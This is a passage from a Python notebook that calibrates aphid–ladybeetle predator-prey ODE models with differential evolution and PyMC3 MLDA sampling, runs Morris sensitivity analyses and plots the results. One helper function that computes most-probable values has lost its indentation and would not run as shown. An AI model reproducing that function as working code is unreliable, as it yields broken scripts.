        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
    )
# Coarse level 2: every 2nd observation.
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
    [observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
    # Prior distributions for the model's parameters
    r1_ = pm.Uniform(
        "r1",
        lower=(1.0 - percent_calibration) * r1,
        upper=(1.0 + 10 * percent_calibration) * r1,
    )
    # r2_ = pm.Uniform(
    #     "r2",
    #     lower=(1.0 - percent_calibration) * r2,
    #     upper=(1.0 + percent_calibration) * r2,
    # )
    r2_ = pm.Data("r2", r2)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=(1.0 + 10 * percent_calibration) * a1,
    )
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a2_ = pm.Data("a2", a2)
    # a3_ = pm.Uniform(
    #     "a3",
    #     lower=(1.0 - percent_calibration) * a3,
    #     upper=(1.0 + percent_calibration) * a3,
    # )
    a3_ = pm.Data("a3", a3)
    # Priors for Initial Conditions
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    # NOTE(review): lower=0 here, whereas the other two models use lower=1 — confirm.
    standard_deviation = pm.Uniform("std_deviation", lower=0, upper=800, shape=2) # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_2)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "LP2_model",
        LP2_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
    )
with fine_model_LP2:
    # Multi-Level Delayed Acceptance sampling. Only coarse_model_1 is passed
    # as a coarse chain; coarse_model_2 above is defined but not used here.
    step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
    # step = pm.DEMetropolisZ()
    trace_calibration_LP2 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[437]:
plt.hist(trace_calibration_LP2['r1'], bins=35)
plt.show()
# In[438] equivalent:
# Variables to plot/summarize: only these were actually sampled (r2, a2, a3
# were held fixed via pm.Data above).
calibration_variable_names = [
    "std_deviation",
    "r1",
    "a1",
]
# In[ ]:
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
    pm.plot_posterior(
        trace_calibration_LP2[::plot_step],
        var_names=(f"{variable}"),
        kind="hist",
        round_to=4,
        point_estimate="mode"
    )
    plt.savefig(f"img/{variable}_posterior_cal_LP2.png")
# In[ ]:
# Joint pairwise posterior (hexbin) with marginals.
az.plot_pair(
    trace_calibration_LP2,
    var_names=calibration_variable_names,
    kind="hexbin",
    fill_last=False,
    marginals=True,
    figsize=(10, 8),
)
plt.savefig("img/marginals_cal_LP2.png")
# In[ ]:
df_stats_summary = az.summary(
    data=trace_calibration_LP2,
    var_names=calibration_variable_names,
    kind='stats',
    round_to=15, # floating-point rounding in the summary
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[ ]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
    """Compute the most probable value (KDE mode) of each traced variable.

    Scalar variables yield one entry keyed by their name; vector-valued
    variables are expanded into one entry per dimension, keyed ``"name[i]"``.
    """
    mpv_estimates = dict()
    progress_bar = tqdm(variable_names)
    for variable in progress_bar:
        progress_bar.set_description(f"Calculating MPV from KDE for {variable}")
        realizations = pm_trace[f"{variable}"]
        # A 1-D realization array has no second axis — treat it as scalar.
        try:
            dimensions = realizations.shape[1]
        except IndexError:
            dimensions = 0
        if dimensions == 0:
            mpv_estimates[f"{variable}"] = _scalar_rv_mvp_estimation(realizations)
        else:
            for dim in range(dimensions):
                component = np.array(realizations[:, dim])
                mpv_estimates[f"{variable}[{dim}]"] = _scalar_rv_mvp_estimation(component)
    return mpv_estimates
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
    """Return a copy of the ArviZ summary with an extra ``mpv`` column.

    The column is aligned by index with the variable names that key
    ``rv_modes_dict``; the input frame is left untouched.
    """
    summary_with_mpv = arviz_summary.copy()
    summary_with_mpv["mpv"] = pd.Series(
        data=list(rv_modes_dict.values()),
        index=list(rv_modes_dict.keys()),
    )
    return summary_with_mpv
# In[ ]:
calibration_variable_mpv = calculate_rv_posterior_mpv(
    pm_trace=trace_calibration_LP2, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_LP2.csv") # saving to a CSV file for later reference
df_stats_summary
# In[ ]:
# 95% credible band (2.5th-97.5th percentile) and median of the posterior
# model trajectories.
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_LP2["LP2_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_LP2["LP2_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_LP2["LP2_model"], 50, axis=0)
# In[ ]:
plt.figure(figsize=(15, 5))
# Column 0: aphids; column 1: ladybeetles (cf. the vstack(...).T layout above).
plt.plot(
    time_observations,
    y_fit[:, 0],
    "r",
    label="Aphids (simulated)",
    marker="X",
    linestyle="-",
    markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
    time_observations,
    y_fit[:, 1],
    "b",
    label="Ladybeetles (simulated)",
    marker="o",
    linestyle="-",
    markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
    time_observations,
    aphid_observed.Density.values,
    label="Aphids data",
    marker="s",
    linestyle="",
    markersize=10
)
plt.plot(
    time_observations,
    ladybeetle_observed.Density.values,
    label="Ladybeetles data",
    marker="v",
    linestyle="",
    markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_LP2.png", dpi=300)
plt.show()
# In[ ]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # also keep the realizations in a Python dict
progress_bar = tqdm(calibration_variable_names[1:])  # skip std_deviation
for variable in progress_bar:
    progress_bar.set_description(f"Gathering {variable} realizations")
    parameter_realization = trace_calibration_LP2.get_values(f"{variable}")
    dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_LP2.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[ ]:
df_realizations
# # Logistic Prey Growth FR3 model
# In[ ]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def LP3_model(
    t,
    X,
    r1 = 1,
    r2 = 1,
    a1 = 1,
    a2 = 1,
    a3 = 1,
):
    """RHS of the LP3 system (logistic prey growth, Holling type-III response).

    u' = r1*u - r2*u^2 - a1*u^2*v / (a2 + a3*u^2); v' = 0, i.e. the predator
    density is held constant in this variant.
    """
    u, v = X
    u_prime = r1 * u - r2 * u * u - a1 * u * u * v / ( a2 + a3 * u * u )
    v_prime = 0
    return u_prime, v_prime
def LP3_ode_solver(
    y0,
    t_span,
    t_eval,
    r1 = 1,
    r2 = 1,
    a1 = 1,
    a2 = 1,
    a3 = 1,
):
    """Integrate the LP3 system with LSODA and return the solve_ivp result."""
    model_parameters = (r1, r2, a1, a2, a3)
    return solve_ivp(
        fun=LP3_model,
        y0=y0,
        t_span=t_span,
        t_eval=t_eval,
        method="LSODA",
        args=model_parameters,
    )
# Evaluation grid matching the number of experimental observations.
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[ ]:
def LP3_least_squares_error_ode(
    par, time_exp, f_exp, fitting_model, initial_conditions
):
    """Weighted least-squares residual between the model solution and data.

    Integrates ``fitting_model`` over the span of ``time_exp`` with parameters
    ``par`` and returns the mean (over the two observed quantities) of the
    weighted sums of squared residuals. A large penalty (1e15) is returned
    when the integrator raises ValueError (e.g. an unstable parameter set).
    """
    observed_prey, observed_predator = f_exp
    integration_window = (time_exp.min(), time_exp.max())
    prey_weight = 1
    predator_weight = 1
    num_of_qoi = len(f_exp)
    try:
        solution = fitting_model(initial_conditions, integration_window, time_exp, *par)
        simulated_prey, simulated_predator = solution.y
        prey_term = prey_weight * np.sum((observed_prey - simulated_prey) ** 2.0)
        predator_term = predator_weight * np.sum((observed_predator - simulated_predator) ** 2.0)
        objective_function = 1 / num_of_qoi * (prey_term + predator_term)
    except ValueError:
        objective_function = 1e15
    return objective_function
def callback_de(xk, convergence):
    """Progress callback for scipy's differential_evolution.

    Prints the current best parameter vector; the implicit None return lets
    the optimization continue.
    """
    print(f'parameters = {xk}', end='\n\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[ ]:
from scipy import optimize
# Seed for reproducibility of the stochastic optimizer.
seed = 1234
# Reference parameter values (apparently from a previous calibration run);
# the DE search bounds below are centered on these.
r1=0.0013449982979212053
r2=5.107493312221165e-09
a1=0.29248668073045164
a2=0.00010184919192640282
a3=0.034710039784000675
# Each bound spans [10%, 190%] of the corresponding reference value.
denom_min = 0.1
denom_max = 1.9
bounds_LP3 = [
    ( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
    ( ( r2 * denom_min ), ( r2 * denom_max ) ), # r2
    ( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
    ( ( a2 * denom_min ), ( a2 * denom_max ) ), # a2
    ( ( a3 * denom_min ), ( a3 * denom_max ) ), # a3
]
# Global minimization of the LP3 least-squares residual against the data.
result_LP3 = optimize.differential_evolution(
    LP3_least_squares_error_ode,
    bounds=bounds_LP3,
    args=(
        aphid_data.Time.values,
        [aphid_data.Density.values, ladybeetle_data.Density.values],
        LP3_ode_solver,
        y0,
    ),
    popsize=30,
    strategy="best1bin",
    tol=1e-5,
    recombination=0.95,
    mutation=0.6,
    maxiter=20000, # 2000
    polish=True,
    disp=True,
    seed = seed, # for the sake of reproducibility
    callback=callback_de,
    workers=-1,
)
print(result_LP3)
# * Retrieving the calibrated parameter values:
# In[ ]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
# Unpack the optimizer's best parameter vector.
(
    r1_deterministic,
    r2_deterministic,
    a1_deterministic,
    a2_deterministic,
    a3_deterministic,
) = result_LP3.x
solution_ODE_LP3 = LP3_ode_solver(
    y0,
    (t0, tf + days_to_forecast),
    time_range,
    *result_LP3.x
)
t_computed_LP3, y_computed_LP3 = solution_ODE_LP3.t, solution_ODE_LP3.y
u_LP3, v_LP3 = y_computed_LP3
parameters_dict = {
    "Model": "LP3",
    u"$r1$": r1_deterministic,
    u"$r2$": r2_deterministic,
    u"$a1$": a1_deterministic,
    u"$a2$": a2_deterministic,
    u"$a3$": a3_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "r2=" + str(r2_deterministic) + "\n" + "a1=" + str(a1_deterministic) + "\n" + "a2=" + str(a2_deterministic) + "\n" + "a3=" + str(a3_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[ ]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
# Calibrated trajectory vs. observed aphid densities.
plt.plot(t_computed_LP3, u_LP3, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
# Calibrated trajectory vs. observed ladybeetle densities.
plt.plot(t_computed_LP3, v_LP3, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[ ]:
from SALib.sample.morris import sample as ee_sample
# Nominal parameter values; each factor perturbed by +/-50%.
mean_values_params = [
    r1,
    r2,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$r2$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
# QoI: the least-squares objective evaluated at each Morris sample.
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    residual_least_squares_result = LP3_least_squares_error_ode(
        parameters_realization,
        aphid_data.Time.values,
        [u_data, v_data],
        LP3_ode_solver,
        y0
    )
    qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[ ]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
# Normalize mu* so the indices sum to one across factors.
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
    df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[ ]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_LP3.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[ ]:
from SALib.sample.morris import sample as ee_sample
# Same problem definition; QoI is now the simulated prey trajectory.
mean_values_params = [
    r1,
    r2,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$r2$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
# Rows: Morris samples; columns: time points of the prey trajectory.
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    realization_ODE_LP3 = LP3_ode_solver(
        y0,
        (t0, tf + days_to_forecast),
        time_range,
        *parameters_realization
    )
    u_realization, v_realization = realization_ODE_LP3.y
    qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[ ]:
from SALib.analyze.morris import analyze as ee_analyze
# Time-dependent Morris analysis of the LP3 prey trajectory.
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # Was a bare `except:`, which also swallowed KeyboardInterrupt and
        # SystemExit. Failed time points are skipped and cleaned up by
        # dropna() below.
        continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)  # drop the first time point — presumably degenerate at t0; confirm
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[ ]:
df_sigmai
# In[ ]:
# Stacked bars of normalized mu* over time (every 2nd valid time point).
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
# NOTE(review): formatter indexes by raw tick value `x`; assumes integer bar positions.
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_LP3.png", dpi=300)
plt.show()
# In[ ]:
# Same plot for the normalized sigma.
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_LP3.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[ ]:
def calculate_pest_time_derivative_series(
    time_array,
    u_array,
    v_array,
    ode_model,
    model_pars
):
    """Evaluate the pest (prey) RHS of ``ode_model`` along a trajectory.

    For each time in ``time_array`` the corresponding (u, v) state is fed to
    ``ode_model`` and the first returned component (du/dt) is collected.

    Returns a NumPy array of du/dt values, one per time point.
    """
    derivatives = [
        ode_model(current_time, [u_array[k], v_array[k]], *model_pars)[0]
        for k, current_time in enumerate(time_array)
    ]
    return np.array(derivatives)
# In[ ]:
# Time derivative of the pest population along the fitted LP3 trajectory.
pest_time_derivative_array = calculate_pest_time_derivative_series(
    t_computed_LP3,
    u_LP3,
    v_LP3,
    LP3_model,
    mean_values_params
)
pest_time_derivative_array
# In[ ]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_LP3, u_LP3, '-x', label='Pest population')
plt.plot(t_computed_LP3, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_LP3.png", dpi=300)
plt.show()
# In[ ]:
# Morris problem for the derivative QoI: +/-50% bounds around the nominal
# LP3 parameter values.
mean_values_params = [
    r1,
    r2,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$r2$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
# Solve the LP3 system for every Morris sample and collect the pest
# time-derivative trajectory of each realization as the QoI matrix.
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    realization_ODE_LP3 = LP3_ode_solver(
        y0,
        (t0, tf + days_to_forecast),
        time_range,
        *parameters_realization
    )
    u_realization, v_realization = realization_ODE_LP3.y
    pest_time_derivative_array = calculate_pest_time_derivative_series(
        time_range,
        u_realization,
        v_realization,
        LP3_model,
        parameters_realization
    )
    qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[ ]:
# One row per time point; parameter columns are filled by the analysis loop below.
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
# Morris elementary-effects analysis of the LP3 pest-derivative QoI at each
# time point; failed analyses are skipped and their NaN rows dropped below.
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        # Normalize so the indices of all parameters sum to one per time point.
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # Was a bare `except:`: keep the deliberate best-effort skip but stop
        # swallowing KeyboardInterrupt/SystemExit.
        continue
# Order chronologically, drop the initial time point and NaN rows, reindex.
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[ ]:
df_sigmai
# In[ ]:
# Stacked bar chart of normalized mu* over time (LP3 pest-derivative QoI).
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2  # plot every other time point to keep the axis readable
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
# NOTE(review): tick value used directly as an index into the subsampled time
# array -- assumes integer tick positions; confirm.
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_LP3.png", dpi=300)
plt.show()
# In[ ]:
# Same chart for the normalized sigma indices.
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_LP3.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[ ]:
@theano.compile.ops.as_op(
    itypes=[
        t.dvector,  # evaluation times
        t.dscalar,  # r1
        t.dscalar,  # r2
        t.dscalar,  # a1
        t.dscalar,  # a2
        t.dscalar,  # a3
        t.dscalar,  # u0
        t.dscalar,  # v0
    ],
    otypes=[t.dmatrix]
)
def LP3_ode_wrapper(time_exp, r1, r2, a1, a2, a3, u0, v0):
    """Theano op wrapping LSODA integration of the LP3 model.

    Lets PyMC3 embed the ODE solution in a probabilistic model. Returns the
    solution evaluated at ``time_exp`` as a (len(time_exp), 2) matrix with
    columns (aphids, ladybeetles), matching the observation matrix layout.
    """
    time_span = (time_exp.min(), time_exp.max())
    args = [r1, r2, a1, a2, a3]
    initial_conditions = np.array([u0, v0])
    y_model = solve_ivp(
        LP3_model,
        time_span,
        initial_conditions,
        t_eval=time_exp,
        method='LSODA',
        args=args
    )
    simulated_time = y_model.t
    simulated_ode_solution = y_model.y
    simulated_qoi1, simulated_qoi2 = simulated_ode_solution
    # Stack the two state trajectories column-wise to match the data layout.
    concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
    return concatenate_simulated_qoi
# In[ ]:
# Observed series cast to float64 for the Theano op; rows = times,
# columns = (aphids, ladybeetles).
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T  # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000  # NOTE(review): unused -- pm.sample below hard-codes draws=4500
start_time = time.time()
percent_calibration = 0.95
# Fine (full-resolution) model for the MLDA sampler: only a1 and a3 are free;
# the remaining parameters are fixed at their deterministic estimates via pm.Data.
with pm.Model() as fine_model_LP3:
    # Prior distributions for the model's parameters
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    # r2_ = pm.Uniform(
    #     "r2",
    #     lower=(1.0 - percent_calibration) * r2,
    #     upper=(1.0 + percent_calibration) * r2,
    # )
    r2_ = pm.Data("r2", r2)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=1e6  # widened from (1.0 + percent_calibration) * a1
    )
    # a2_ = pm.Uniform(
    #     "a2",
    #     lower=(1.0 - percent_calibration) * a2,
    #     upper=(1.0 + percent_calibration) * a2,
    # )
    a2_ = pm.Data("a2", a2)
    a3_ = pm.Uniform(
        "a3",
        lower=(1.0 - percent_calibration) * a3,
        upper=1e6  # widened from (1.0 + percent_calibration) * a3
    )
    # Prioris for Initial Conditions
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2)  # note 'shape' here: one std per observed series
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "LP3_model",
        LP3_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            a1_,
            a2_,
            a3_,
            u0_,
            v0_,
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
    )
# Coarse dataset 1: every 4th observation, the cheap MLDA level's data.
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
    [observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
# Coarse model 1: identical priors/likelihood to the fine model, but fitted to
# every 4th observation; used as the cheap level of the MLDA sampler.
with pm.Model() as coarse_model_1:
    # Prior distributions for the model's parameters
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    # r2_ = pm.Uniform(
    #     "r2",
    #     lower=(1.0 - percent_calibration) * r2,
    #     upper=(1.0 + percent_calibration) * r2,
    # )
    r2_ = pm.Data("r2", r2)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=1e6  # widened from (1.0 + percent_calibration) * a1
    )
    # a2_ = pm.Uniform(
    #     "a2",
